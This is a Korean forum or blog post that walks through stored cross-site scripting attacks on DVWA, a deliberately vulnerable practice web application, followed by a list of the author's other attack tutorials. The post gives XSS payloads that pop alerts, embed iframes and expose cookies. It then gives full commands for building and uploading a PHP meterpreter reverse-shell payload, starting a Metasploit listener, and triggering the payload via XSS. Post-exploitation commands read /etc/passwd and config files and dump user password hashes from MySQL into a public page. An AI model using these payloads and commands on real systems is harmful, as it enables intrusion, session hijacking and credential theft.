본문 바로가기
조회 수 5807 추천 수 0 댓글 0
?

단축키

Prev이전 문서

Next다음 문서

+ - Up Down Comment Print Files
?

단축키

Prev이전 문서

Next다음 문서

+ - Up Down Comment Print Files

1. XSS Stored Basic Exploit Test

55.png
Name: Test 1
Message: <script>alert("This is a XSS Test")</script>

View Test 1 Results
56.png
Note: Every Time a user comes to this forum, this XSS exploit will be displayed.
Note: This exploit can be easily modified to capture cookie/session information for future Man-in-Middle attacks.

Reset DB
57.png

2. XSS Stored IFRAME Exploit Test
58.png
Name: Test 2
Message: <iframe src="http://www.cnn.com"></iframe>

View Test 2 Results
59.png
Note: This is a powerful exploit because a user could use SET to create Malicious cloned website and place in here.

Reset DB
57.png

3. XSS Stored COOKIE Exploit Test
60.png
Name: Test 3
Message: <script>alert(document.cookie)</script>

View Cookie
61.png
Note: An attacker could easily modify this XSS script to send the cookie to a remote location instead of displaying it.
Note: 원격에서 cookie를 받아서 공격자는 MITM 공격을 할 수 있다. victim으로 가장하여 해당 사이트에 접속, 해당 victim의 정보에 접근가능

Reset DB
57.png

7. XSS Stored window.location Exploit Test

1) Build PHP msfpayload from kali
mkdir -p /root/backdoor
cd /root/backdoor
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.122.148 LPORT=4444 R > FORUM_BUG.php
ls -l FORUM_BUG.php
vi FORUM_BUG.php <-------------- <?php의 주석을 제거

2) Upload PHP Payload
62.png

3) Start PHP Payload Listener from kali
msfconsole
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.122.148
set LPORT 4444
exploit

4) XSS Stored window.location Exploit
: 위에서 저장한 FORUM_BUG.php을 불러오는 js를 입력

63.png
Name: Test 4
Message: <script>window.location="http://192.168.122.179/dvwa/hackable/uploads/FORUM_BUG.php" </script>

5) access from victim

6) View Metasploit Session
from Meterpreter:
shell
tail /etc/passwd
whoami
grep apache /etc/passwd
find /var/www/* -print | grep config
grep "db_" /var/www/html/dvwa/config/config.inc.php
echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD
echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD
echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
echo "<pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html <--------- The <pre> is used as a pre-formatter
echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD >> /var/www/html/dvwa/hackable/uploads/xss.html
echo "</pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html <--------- 이제 이 페이지에 접근시 위 DB에서 가져온 정보를 볼 수 있다

Title
List of Articles
번호 제목 글쓴이 날짜 조회 수
46 How to install Xplico on Kali Hojung 2014.09.29 6943
45 MITM: Ettercap (automated arp spoof) + Xplico (pcap analyzer) file Hojung 2014.09.29 6779
44 DVWA - Upload and use C99.php Backdoor shell (upload C99.php and activate) file Hojung 2014.10.04 6432
43 DoS (Denial of Service) 공격에 대해 (Ping of Death, Syn Flooding 공격/탐지/대응, Tear Drop, Smurf/Fraggle, LAND Attack) file Hojung 2014.11.02 6029
» DVWA - Stored XSS (Cross Site Scripting) file Hojung 2014.10.04 5807
41 DVWA - Burp Suite, Man-in-the-middle-attack (burp 사용해 cookie를 확보 후 firefox에서 cookie 조작) file Hojung 2014.10.04 5534
40 Cracking password protected zip files with John on OSX Hojung 2014.08.23 5533
39 DVWA - Automated SQL Injection with SqlMap (SQLi에 사용되는 URL 및 Cookie를 가지고 자동으로 injectin) file Hojung 2014.10.04 5510
38 Session Cookie 세부항목에 대해 (secure, Http Only flag) Hojung 2015.01.06 5490
37 DVWA - Using the nikto.pl web vulnerability scanner file Hojung 2014.10.04 5243
36 DNS Spoofing from CLI (ip forwarding + arp spoofing + dns spoofing with ettercap) file Hojung 2014.10.06 5166
35 쉘코드(shell code)란 payload로 사용되는 작은 코드조각 Hojung 2014.12.23 4912
34 DHCP starvation attack by Yersinia file Hojung 2014.09.27 4636
33 brute-force HTTP/S basic access authentication with hydra file Hojung 2015.01.07 4380
32 Install WebGoat 5.3 in Kali file Hojung 2015.02.02 4365
31 Slowloris attack Hojung 2014.08.20 4203
30 DVWA - Upload PHP Backdoor Payload (PHP파일 업로드 후 web을 통해 액세스. 즉, 서버에서 php 실행됨) file Hojung 2014.10.04 4167
29 How To Install Metasploit Framework In MacOSX (homebrew, postgres) Hojung 2014.08.28 4149
28 DVWA - Manual SQL Injection and John the Ripper with sql result file Hojung 2014.10.04 4142
27 DVWA - Using Metasploit with Command Execution (backdoor using nc and access from Metasploit) file Hojung 2014.10.04 3945
Board Pagination ‹ Prev 1 2 ... 3 Next ›
/ 3

Designed by sketchbooks.co.kr / sketchbook5 board skin

나눔글꼴 설치 안내


이 PC에는 나눔글꼴이 설치되어 있지 않습니다.

이 사이트를 나눔글꼴로 보기 위해서는
나눔글꼴을 설치해야 합니다.

설치 취소

Sketchbook5, 스케치북5

Sketchbook5, 스케치북5

Sketchbook5, 스케치북5

Sketchbook5, 스케치북5